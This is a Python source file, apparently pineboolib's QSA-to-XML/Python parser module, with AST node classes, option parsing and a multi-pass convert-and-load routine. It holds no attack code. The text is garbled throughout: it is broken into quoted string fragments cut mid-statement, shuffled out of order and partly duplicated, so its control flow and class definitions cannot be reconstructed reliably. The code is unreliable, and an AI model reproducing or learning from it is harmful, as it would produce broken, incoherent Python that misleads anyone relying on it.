"= \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"]",
"else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def post_parse(treedata): source =",
"+ 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read()",
"tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"]",
"args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args",
"= str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\" value =",
"or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename",
"filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text) > 2: print(\"%s:",
"args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import",
"%s\" % name) continue mod = Module(name, path) if not mod.loadModule(): print(\"Error cargando",
"not tree_data: print(\"No se pudo parsear %-35s \\n\" % (repr(filename))) continue ast =",
"tags = [] set_child_argn = False name_is_first_id = False debug_other = True adopt_childs_tags",
"name_is_first_id = False debug_other = True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem",
"self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype == \"ID\"",
"getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype,",
"filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname +",
"listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem):",
"print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\",",
"callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags =",
"v) i += 1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) #",
"os.path.join(options.storepath, bname + \".xml\") else: destname = filename + \".xml\" f1 = open(destname,",
"= \"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType]",
"# adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems) ==",
"print(\"No se pudo analizar %-35s \\n\" % (repr(filename))) continue if options.storepath: destname =",
"execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full = True if isinstance(filelist,",
"print(\"Error: No se pudo abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] >",
"def is_in(self, listobj): return self.__class__ in listobj or self.astname in listobj def get(self,",
"InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other",
"in args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: #",
"vtype) def polish(self): # if len(self.values) == 0 and len(self.subelems) == 1: #",
"def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class Function(ListNamedObject):",
"True debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags",
"execute(options, args): if options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python =",
"def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn",
"self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\",",
"= 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def",
"% argn, vtype + \":\" + repr(value)) def add_other(self, argn, vtype, data): if",
"del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__",
"python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\")",
"if options.full: execpython = options.exec_python options.exec_python = False options.full = False options.toxml =",
"parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False,",
"analizar %-35s \\n\" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname +",
"in listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return",
"print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3 -",
"continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . . . (%.1f%%) \\r\"",
"% argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems)",
"\"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject):",
"ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags =",
"help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists,",
"class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list',",
"if options.verbose: print(\"Pass 1 - Parse and write XML file . . .\")",
"\"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value) return",
"\"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se pudo",
"return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags",
"debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags =",
"try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e:",
"class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags =",
"class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True",
"[\"mathoperator\"] class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags",
"tags = [\"constant\"] def add_value(self, argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\")",
"\"Number\" if vtype == \"FCONST\": vtype = \"Number\" self.const_value = value self.const_type =",
"is None: self.astname = \"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"] def",
"- Pythonize and write PY file . . .\") try: execute(options, [arg +",
"= [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"]",
"argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype",
"k, v in treedata['content']: if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i,",
"def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__ in listobj or",
"encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . .",
"os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\" %",
"self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype == \"ID\" and",
"== \"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value)",
"%s\" % name) elif options.topython: from .pytnyzer import pythonize import io if options.cache:",
"True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args):",
"else: destname = filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close()",
"+ (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args = [x for x",
"main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([])",
"stream try: pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error al pythonificar %r:\"",
"Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname is None: self.astname =",
"0: self.astname = \"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags",
"+ 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO()",
"= parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name,",
"{} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] =",
"e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo",
"ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for filename in args:",
"if not prog: print(\"Error: No se pudo abrir %-35s \\n\" % (repr(filename))) continue",
"Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose: print(\"Pass",
"builtins import object from optparse import OptionParser import os import os.path import sys",
"= flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se pudo abrir fichero %-35s",
"io if options.cache: args = [x for x in args if not os.path.exists((x",
"arg in args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python:",
"\"ICONST\": vtype = \"Number\" if vtype == \"FCONST\": vtype = \"Number\" self.const_value =",
"/ nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout =",
"argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone:",
"value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype = \"String\" value",
"from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\",",
"from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS =",
"# self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem",
"* (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename,",
"if len(self.values) == 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if",
"= os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s . . . . (%.1f%%)",
"100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout",
"1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"]",
"add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags",
"= ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class",
"[\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone =",
"None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj",
"[] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self,",
"options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename,",
"DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression']",
"self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__ in listobj",
"subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in",
"import imp import traceback from lxml import etree try: from pineboolib.flparser import flscriptparse",
"class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True",
"polish(self): if len(self.subelems) == 0: self.astname = \"empty\" return self class DictObject(ListObject): tags",
"+= 1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys()",
"str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\" value = value[1:-1]",
"add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if",
"no encontrado\" % self.name) result = False except Exception as e: print(traceback.format_exc()) result",
"parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False,",
"[\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname))",
"fp: fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\",",
"= [\"instruction\"] class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other",
"and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag",
"class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname is None: self.astname",
"- Test PY file load . . .\") options.topython = False try: execute(",
"try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS",
"= ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self, tagname): return",
"\"FCONST\": vtype = \"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\",",
"vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype",
"def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn,",
"debug_other = True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone",
"adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname is",
"subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem)",
"= [x for x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or",
"\\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error:",
"file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\",",
"('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name)",
"len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return",
"False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False",
"self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class",
"print(\"No se pudo parsear %-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data) if",
"os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args) for",
"= [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone",
"execpython = options.exec_python options.exec_python = False options.full = False options.toxml = True if",
"file . . .\") try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml",
"options.exec_python = False options.full = False options.toxml = True if options.verbose: print(\"Pass 1",
"old_stderr text = stream.getvalue() if len(text) > 2: print(\"%s: \" % bname +",
"self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and",
"No se pudo abrir fichero %-35s \\n\" % (repr(filename)), e) continue prog =",
"hace falta calcular mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0)",
"self.__class__ in listobj or self.astname in listobj def get(self, listobj, default=None): if self.__class__",
"= \"Regex\" if vtype == \"ICONST\": vtype = \"Number\" if vtype == \"FCONST\":",
"options.topython = False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in",
"source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self,",
"options.exec_python: # import qsatype for filename in args: realpath = os.path.realpath(filename) path, name",
"XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\")",
"tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this one",
"class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags",
"vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone: if",
"help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python",
". . . (%.1f%%) \\r\" % (bname, 100.0 * (nf + 1.0) /",
"False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname",
"action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML",
"options.cache: args = [x for x in args if not os.path.exists(x + \".xml\")",
"class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression']",
"subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback =",
"= vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self,",
"set_child_argn = False @classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname):",
"= [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class",
"False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except",
"from builtins import object from optparse import OptionParser import os import os.path import",
"messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False,",
"- Parse and write XML file . . .\") try: execute(options, args) except",
"dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags =",
"if vtype == \"FCONST\": vtype = \"Number\" self.const_value = value self.const_type = vtype",
"Exception: print(\"Error al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data:",
"= None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a",
"== \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return self",
"def add_value(self, argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype ==",
"tags = [\"optvartype\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return",
"= False options.full = False options.toxml = True if options.verbose: print(\"Pass 1 -",
"promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname):",
"in listobj def get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if",
"args if not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs",
"def get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname in",
"stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints",
"KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname,",
"[\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject):",
"subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if",
"if self.xmlname is None: self.astname = \"empty\" return self class ExtendsType(NamedObject): tags =",
"default=False, help=\"If dest file exists, don't regenerate it\") (options, args) = parser.parse_args(argv) return",
"== 0 and len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn",
"= KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\": return \"Source\"",
"class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self, tagname): return",
"args) if options.full: execpython = options.exec_python options.exec_python = False options.full = False options.toxml",
"str from builtins import object from optparse import OptionParser import os import os.path",
"action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write",
"cls break if classobj is None: return None return classobj(tagname) def parse_unknown(tagname, treedata):",
"(options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options,",
"+ \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename in enumerate(args): bname =",
"if not mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif options.topython: from .pytnyzer",
"class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags",
"tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"]",
"= [\"updateoperator\"] # ----- keep this one at the end. class Unknown(TagObject): promote_child_if_alone",
"== 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject): tags =",
"= [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class",
"class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if",
"xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn",
"class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"]",
"\".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf,",
"keep this one at the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn =",
"print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose: print(\"Pass 2 - Pythonize",
"options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python = False options.full =",
"if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def",
"0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class",
"self.astname in listobj def get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__]",
"class Member(TagObject): debug_other = False set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags",
"tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags",
"\"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags =",
"False options.topython = True if options.verbose: print(\"Pass 2 - Pythonize and write PY",
"str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype,",
"os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename in enumerate(args): bname",
"== \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type):",
"tagname == \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\"",
"tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags =",
"pathname = os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname,",
"return self.subelems[0] else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"]",
"parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to",
"Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems)",
"== \"FCONST\": vtype = \"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype)",
"in listobj or self.astname in listobj def get(self, listobj, default=None): if self.__class__ in",
"class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags",
"parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for k, v in treedata['content']:",
"ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other",
"bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear %-35s \\n\" % (repr(filename)))",
"\" % (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush()",
"action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False,",
"for filename in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not",
".\") try: execute(options, [arg + \".xml\" for arg in args]) except Exception: print(\"Error",
"destname = os.path.join(options.storepath, bname + \".py\") else: destname = filename + \".py\" destname",
"modulo %s\" % name) elif options.topython: from .pytnyzer import pythonize import io if",
"if vtype == \"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if",
"['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject):",
"> os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename in enumerate(args):",
"len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other",
"listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj: return",
"polish(self): if self.xmlname is None: self.astname = \"empty\" return self class Arguments(ListObject): tags",
"no existe: %s\" % name) continue mod = Module(name, path) if not mod.loadModule():",
"dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id = False",
"+ \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args)",
"class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags",
"= stream try: pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error al pythonificar",
"== \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" %",
"adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"]",
"vtype == \"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype",
"= True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False",
"listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn,",
"tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"]",
"== 0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) == 0 and len(self.subelems)",
"print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose: print(\"Pass 2",
